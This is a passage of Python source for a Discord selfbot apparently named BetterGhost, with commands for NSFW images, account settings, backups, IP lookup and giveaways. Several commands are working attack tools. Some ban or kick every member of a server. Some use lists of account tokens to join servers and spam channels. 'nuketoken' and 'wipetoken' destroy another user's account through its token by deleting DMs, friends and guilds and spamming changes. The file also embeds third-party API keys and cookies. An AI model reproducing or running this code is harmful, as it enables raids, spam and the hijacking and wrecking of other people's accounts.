if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@BetterGhost.command(name="porngif", description="Porn gifs.", usage=f"porngif")
async def porngif(ctx):
type = "porngif"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@BetterGhost.command(name="hentai", description="Pictures or videos of hentai.", usage=f"hentai")
async def hentai(ctx):
type = random.randint(1, 2)
if type == 1:
image = requests.get("https://nekos.life/api/lewd/neko").json()["neko"]
elif type == 2:
image = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif").json()["url"]
if __embedmode__:
embed = discord.Embed(title=f"hentai", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="discordtheme", description="Change default Discord theme.", usage="discordtheme [light/dark]")
async def discordtheme(ctx, theme = "dark"):
theme = theme.lower()
validThemes = ["dark", "light"]
if theme in validThemes:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setTheme(theme)
await ctx.send(f"Set Discord theme to `{theme}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid Discord theme.", delete_after=__deletetimeout__)
@BetterGhost.command(name="changehypesquad", description="Change your hypesquad house.", usage="changehypesquad [bravery/brilliance/balance]")
async def changehypesquad(ctx, house):
house = house.lower()
houses = ["bravery", "brilliance", "balance"]
if house in houses:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setHypesquad(house)
await ctx.send(f"Changed your hypesquad house to `{house[:1].upper() + house[1:].lower()}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid hypesquad house.", delete_after=__deletetimeout__)
@BetterGhost.command(name="backupfriends", description="Backup all your friend's user IDs to a file.", usage="backupfriends", aliases=["friendbackup"])
async def backupfriends(ctx):
print_info("Grabbing all friends...")
request = requests.get("https://discord.com/api/v6/users/@me/relationships", headers={"authorization": __token__})
json = request.json()
ids = []
blockedIds = []
incoming = []
outgoing = []
for item in json:
if item["type"] == 1:
print_info(f'Backed up {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}!')
ids.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 2:
print_info(f'Backed up a blocked user : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
blockedIds.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 3:
print_info(f'Backed up an incoming friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
incoming.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 4:
print_info(f'Backed up an outgoing friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
outgoing.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
print_info("Backed up all friends!")
await ctx.send(f"Backed up a total of `{len(ids)}` friends, `{len(blockedIds)}` blocked, `{len(outgoing)}` outgoing friend requests and `{len(incoming)}` incoming friend requests to __data/friends.txt__.", delete_after=__deletetimeout__)
if not ids:
ids.append("Couldnt find any friends.")
if not blockedIds:
blockedIds.append("Couldnt find any blocked users.")
if not outgoing:
outgoing.append("Couldnt find any outgoing friend requests.")
if not incoming:
incoming.append("Couldnt find any incoming friend requests.")
file = codecs.open("data/friends.txt", "w", encoding="utf-8")
file.write(
"Current Friends\n===============\n" + "\n".join(ids) +
"\n \nOutgoing Requests\n=================\n" + "\n".join(outgoing) +
"\n \nIncoming Requests\n=================\n" + "\n".join(incoming) +
"\n \nBlocked Users\n=============\n" + "\n".join(blockedIds)
)
file.close()
@BetterGhost.command(name="backupservers", description="Backup all your servers and try to create invites for each one.", usage="backupservers", aliases=["backupguilds", "serverbackup", "guildbackup"])
async def backupservers(ctx):
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
try:
await ctx.message.delete()
except:
pass
print_info("Saving and creating invites for your guilds with a 4 second interval...")
guilds = requests.get("https://discordapp.com/api/v6/users/@me/guilds", headers={"authorization": __token__}).json()
print_info("Grabbing all the guilds...")
guildsIdsAndInvites = []
for item in guilds:
guildid = item["id"]
guildname = item["name"]
invite = ""
print_info(f"Trying to create invite for {guildname}")
server = discord.utils.get(BetterGhost.guilds, id=int(guildid))
for channel in server.text_channels:
if invite == "":
invite = DiscumClient.createInvite(str(channel.id))
if invite.status_code == 200:
invite = invite.json()["code"]
else:
invite = ""
break
if invite == "":
invite = "Failed to create an invite."
guildsIdsAndInvites.append(item["name"] + " : " + str(item["id"]) + " : discord.gg/" + str(invite))
await asyncio.sleep(4)
print_info(f"Saved guilds data.")
file = codecs.open("data/servers.txt", "w", encoding="utf-8")
file.write("\n".join(guildsIdsAndInvites))
file.close()
await ctx.send("Saved a list of all your guilds and their IDs in __data/servers.txt__.", delete_after=__deletetimeout__)
@BetterGhost.command(name="richpresence", description="Enable or disable rich presence.", usage="richpresence [on/off]", aliases=["rpc"])
async def richpresence(ctx, status):
if status == "on" or status == "On":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = True
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been enabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
elif status == "off" or status == "Off":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = False
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been disabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
@BetterGhost.command(name="spacechannel", description="Create a channel with spaces.", usage="spacechannel [channel name]")
async def spacechannel(ctx, *, channelName = "example channel name"):
channelName = channelName.replace(" ", channelBlankChar)
await ctx.guild.create_text_channel(name=channelName)
if __embedmode__:
embed = discord.Embed(title=f"Space Channel", description=f"Created a channel with the name `{channelName}`.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Space Channel ]
Created a channel with the name {channelName}.
# {__embedfooter__}
```""")
@BetterGhost.command(name="uwu", description="Translate your messages to uwu!", usage="uwu [message]")
async def uwu__(ctx, *, message):
uwued = uwuify.uwu(message)
await ctx.send(uwued)
@BetterGhost.command(name="uwuify", description="Automatically translate all your sent messages to uwu!", usage="uwuify")
async def uwuify__(ctx):
global uwuifyEnabled
if (uwuifyEnabled):
uwuifyEnabled = False
await ctx.send("All your messages will no longer be translated to uwu.", delete_after=__deletetimeout__)
else:
uwuifyEnabled = True
await ctx.send("All your messages will now be translated to uwu.", delete_after=__deletetimeout__)
@BetterGhost.command(name="geoip", description="Get information from an IP address.", usage="geoip [ip]", aliases=["iplookup", "lookupip", "ipinfo"])
async def geoip(ctx, ip):
data = requests.get(f"http://ip-api.com/json/{ip}").json()
data2 = requests.get(f"https://ipqualityscore.com/api/json/ip/oOswzMILsf8QA7JGtaQDdXARfDtbKW1K/{ip}").json()
country = data["country"]
city = data["city"]
zipCode = data["zip"]
lat = data["lat"]
lon = data["lon"]
isp = data["isp"]
as1 = data["as"]
region = data["regionName"]
vpn = data2["vpn"]
hostname = data2["host"]
if __embedmode__:
embed = discord.Embed(title=f"{ip} information...", color=__embedcolour__)
embed.add_field(name="Country", value=f"```{country}```", inline=False)
embed.add_field(name="City", value=f"```{city}```", inline=True)
embed.add_field(name="Region", value=f"```{region}```", inline=True)
embed.add_field(name="ZIP", value=f"```{zipCode}```", inline=True)
embed.add_field(name="LAT", value=f"```{lat}```", inline=True)
embed.add_field(name="LON", value=f"```{lon}```", inline=True)
embed.add_field(name="VPN", value=f"```{vpn}```", inline=True)
embed.add_field(name="AS", value=f"```{as1}```", inline=False)
embed.add_field(name="ISP", value=f"```{isp}```", inline=False)
embed.add_field(name="Hostname", value=f"```{hostname}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ip} information.. ]
Country: {country}
City: {city}
Region: {region}
ZIP: {zipCode}
LAT: {lat}
LON: {lon}
VPN: {vpn}
AS: {as1}
ISP: {isp}
Hostname: {hostname}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="invite", description="Get BetterGhost's Discord server invite link.", usage="invite")
async def invite(ctx):
print_info(f"Discord server invite: {discordServer}")
@BetterGhost.command(name="pytoexe", description="Convert a PY file to an executable.", usage="pytoexe [path]", aliases=["pythontoexe", "py2exe", "python2exe"])
async def pytoexe(ctx, *, path):
pyFile = False
file = path.split("/")[-1]
if (file.endswith(".py")):
pyFile = True
if (pyFile):
file = file[:-3]
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has started, check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ PY To Executable ]
Conversion for your file has started, check the console for more information.
# {__embedfooter__}
```""")
print_info("Converting your file to an exe using pyinstaller...\nThis will fill your console and possibly take a while.")
os.system(f'pyinstaller -n "{file}" -i "icon.ico" --onefile --distpath "pytoexe/" {path}')
print_info("Conversion complete!")
print(f"{fg.cYellow}Path: {fg.cGrey}pytoexe/{file}.exe")
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has completed! Check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ PY To Executable ]
Converstion for your file has completed! Check the console for more information.
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="The path you submitted does not link to a PY file.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ PY To Executable ]
The path you submitted does not link to a PY file.
# {__embedfooter__}
```""")
@BetterGhost.command(name="statuscycle", description="Start a custom status cycle.", usage="statuscycle", aliases=["cyclestatus"])
async def statuscycle(ctx):
global cycleStatus
if (cycleStatus is False):
cycleStatus = True
else:
cycleStatus = False
def changeStatus(text2, token):
url = "https://discordapp.com/api/v8/users/@me/settings"
payload="{\r\n \"custom_status\": {\r\n \"text\": \"" + text2 + "\"\r\n }\r\n}"
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'Cookie': '__cfduid=d7e8d2784592da39fb3f621664b9aede51620414171; __dcfduid=24a543339247480f9b0bb95c710ce1e6'
}
requests.request("PATCH", url, headers=headers, data=payload)
async def loopStatus(text):
while cycleStatus is True:
for word in text.split(" "):
changeStatus(word, __token__)
await asyncio.sleep(1)
BetterGhost.loop.create_task(loopStatus(cycleStatusText))
if (cycleStatus is True):
await ctx.send(f"Now looping your custom status.", delete_after=__deletetimeout__)
else:
await ctx.send(f"No longer looping your custom status.", delete_after=__deletetimeout__)
@BetterGhost.command(name="statuscycletext", description="Set the text used in status cycle.", usage="statuscycletext [text]", aliases=["cyclestatustext"])
async def statuscycletext(ctx, *, text: str):
global cycleStatusText
cycleStatusText = text
await ctx.send(f"Status cycle text set to `{cycleStatusText}`", delete_after=__deletetimeout__)
@BetterGhost.command(name="ghostping", description="Ping a user then delete the message.", usage="ghostping [@user]")
async def ghostping(ctx, user: discord.User):
pass
@BetterGhost.command(name="getmessage", description="Get a message by ID.", usage="getmessage [message id]", aliases=["fetchmessage"])
async def getmessage(ctx, messageid: int):
msg = await ctx.send("Getting the message . . .")
message = await get_message(ctx, messageid)
if __embedmode__:
embed = discord.Embed(title=f"Get Message", color=__embedcolour__)
embed.add_field(name="Content", value=f"```{message.content}```", inline=True)
embed.add_field(name="Author", value=f"```{message.author}```", inline=True)
embed.add_field(name="Message Link", value=message.jump_url, inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await msg.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await msg.edit(content=f"""```ini
[ Get Message ]
Content: {message.content}
Author: {message.author}
Message Link: {message.jump_url}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="watchdogstats", description="Get stats about Hypixel's Anticheat, Watchdog", usage="watchdogstats")
async def watchdogstats(ctx):
data = requests.get("https://api.hypixel.net/punishmentstats?key=591c390d-6e97-4b39-abb3-ef3fb386aff0").json()
if __embedmode__:
embed = discord.Embed(title=f"Watchdog Stats", color=__embedcolour__)
embed.add_field(name="Total Bans", value="```" + str(data["watchdog_total"]) + "```", inline=True)
embed.add_field(name="Last Minute", value="```" + str(data["watchdog_lastMinute"]) + "```", inline=True)
embed.add_field(name="Daily Bans", value="```" + str(data["watchdog_rollingDaily"]) + "```", inline=True)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Watchdog Stats ]
Total Bans: {data['watchdog_total']}
Last Minute: {data['watchdog_lastMinute']}
Daily Bans: {data['watchdog_rollingDaily']}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="ppin", description="Add a message to your personal pins.", usage="ppin [message id]", aliases=["personalpin", "addppin", "addpersonalpin"])
async def ppin(ctx, msgId: int):
message = await get_message(ctx, msgId)
data = json.load(open("data/personal-pins.json"))
data[msgId] = {}
data[msgId]["content"] = message.content
data[msgId]["author"] = f"{message.author.name}#{message.author.discriminator}"
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Pinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**📌 Personal Pin**\nPinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
@BetterGhost.command(name="ppins", description="List all your pinned messages.", usage="ppins", aliases=["personalpins"])
async def ppins(ctx):
data = json.load(open("data/personal-pins.json"))
ppinsMsg = ""
for value in data:
content = data[value]["content"]
author = data[value]["author"]
ppinsMsg += f"\n__{value}__ :\n** **- Content : `{content}`\n** **- Author : `{author}`"
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=ppinsMsg)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pins**\n{ppinsMsg}")
@BetterGhost.command(name="ppindel", description="Delete a pin from your personal pins.", usage="ppindel [pin id]", aliases=["ppindelete", "removeppin", "deleteppin", "personalpindelete", "deletepersonalpin", "removepersonalpin"])
async def ppindel(ctx, pinId: str):
data = json.load(open("data/personal-pins.json"))
del data[pinId]
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Delete pin `{pinId}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pin**\nDelete pin `{pinId}`.")
@BetterGhost.command(name="countdown", description="Count down from a number.", usage="countdown [number]")
async def countdown(ctx, number: int):
for count in range(number, 0, -1):
await ctx.send(count)
@BetterGhost.command(name="countup", description="Count up from a number.", usage="countup [number]")
async def countup(ctx, number: int):
for count in range(number):
await ctx.send(count)
@BetterGhost.command(name="massban", description="Ban all the members in the command server.", usage="massban")
async def massban(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.ban()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="masskick", description="Kick all the members in the command server.", usage="masskick")
async def masskick(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.kick()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="raidjoin", description="Make all your account tokens join a server.", usage="raidjoin [delay] [invite]")
async def raidjoin(ctx, delay:int = 3, *, invite: str):
if __riskmode__:
print_info(f"Trying to join server with tokens every {delay} seconds.")
for Token in open("data/tokens.txt", "r").readlines():
Token = Token.replace("\n", "")
userAgent = get_random_user_agent()
request = requests.post(f"https://discord.com/api/v9/invites/{invite}", headers={
"Authorization": Token,
"accept": "*/*",
"accept-language": "en-US",
"connection": "keep-alive",
"cookie": f"__cfduid={os.urandom(43).hex()}; __dcfduid={os.urandom(32).hex()}; locale=en-US",
"DNT": "1",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"referer": "https://discord.com/channels/@me",
"TE":"Trailers ",
"User-Agent": userAgent,
"X-Super-Properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
})
if request.status_code == 200:
print_info(f"Joined successfully.")
else:
print_info("Failed to join.")
try:
print_info("Accepted guild rules.")
requests.put(f"https://discord.com/api/guilds/{request['guild']['id']}/requests/@me", headers={"Authorization": Token, "User-Agent": userAgent, "Content-Type": "application/json"}, data=json.dumps({}))
except:
print_info("Couldnt accept guild rules")
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="tokenraid", description="Raid a server with all your account tokens.", usage="tokenraid [threads] [amount] [channel id] (message)")
async def tokenraid(ctx, threadsAmount:int, amount: int, channel_id: int = None, *, text = None):
if __riskmode__:
await ctx.message.delete()
tokens = []
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
def raid():
def sendMessages():
message = text
print_info("Started new thread.")
for _ in range(amount):
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": random.choice(tokens), "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"content": message + f" [{random.randint(1000, 9999)}]"
}))
print_info("Raid has begun.")
threads = []
for _ in range(threadsAmount):
thread = threading.Thread(target=sendMessages())
threads.append(thread)
threads[_].start()
for thread in threads:
thread.join()
print_info("Raid finished.")
BetterGhost.loop.create_task(raid())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="checktoken", description="Checks if a token is working.", usage="checktoken [token]")
async def checktoken(ctx, *, token):
tokens = [token]
valid = "invalid"
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking the token you gave...")
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
valid = "invalid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
valid = "valid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info(f"Check complete, the token is {valid}.")
@BetterGhost.command(name="checktokens", description="Checks if your tokens are working.", usage="checktokens")
async def checktokens(ctx):
tokens = []
validTokens = []
invalidTokens = []
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking your tokens has started.")
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
invalidTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
validTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
open("data/valid-tokens.txt", "w").write('\n'.join(validTokens))
open("data/invalid-tokens.txt", "w").write('\n'.join(invalidTokens))
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info("Check complete.")
print_info(f"Valid tokens: {len(validTokens)} (Saved to data/valid-tokens.txt)")
print_info(f"Invalid tokens: {len(invalidTokens)} (Saved to data/invalid-tokens.txt)")
@BetterGhost.command(name="wipetoken", description="Completely wipe a token.", aliases=["cleantoken"])
async def wipetoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
@BetterGhost.command(name="nuketoken", description="Nuke a token.", usage="nuketoken [token]", aliases=["tokennuke"])
async def nuketoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def themeSpammer():
themes = ["dark", "light"]
for i in range(999999999):
requests.patch("https://discord.com/api/users/@me/settings", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"theme": random.choice(themes)
}))
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def createGuilds():
while True:
requests.post("https://discord.com/api/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"name": "EPIC GAMERS"
}))
threading.Thread(target=themeSpammer).start()
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
threading.Thread(target=createGuilds).start()
@BetterGhost.command(name="gstart", description="Start a giveaway in the same channel", usage="gstart [duration] [winners] [prize]", aliases=["giveawaystart", "startgiveaway"])
async def gstart(ctx, duration=None, winners: int = None, *, prize=None):
if duration is not None:
if winners is not None:
if prize is not None:
if duration.endswith("m"):
duration = duration[:-1]
time = int(duration) * 60
timemins = time // 60
timepretty = f"{timemins} minute(s)"
elif duration.endswith("s"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
elif duration.endswith("h"):
duration = duration[:-1]
time = int(duration) * 3600
timehrs = time // 3600
timepretty = f"{timehrs} hour(s)"
else:
if duration.endswith("s") or duration.endswith("m") or duration.endswith("h"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
e = discord.Embed(
description=f"React with 🎉 to enter!\nEnds in {timepretty}\nHosted by {ctx.author.mention}",
color=__embedcolour__)
if winners >= 2:
e.set_footer(text=f"{winners} winners | Ends at")
else:
e.set_footer(text="1 winner | Ends at")
e.set_author(name=prize)
future = datetime.now() + timedelta(seconds=time)
e.timestamp = future
msg = await ctx.send("🎉 **GIVEAWAY** 🎉", embed=e)
await msg.add_reaction('\U0001F389')
await asyncio.sleep(time)
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == msg.id:
msg = message
